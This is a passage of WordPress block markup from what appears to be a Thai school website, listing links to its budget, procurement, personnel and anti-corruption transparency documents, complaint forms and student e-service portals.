gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> </a><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=sharing\">- คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดห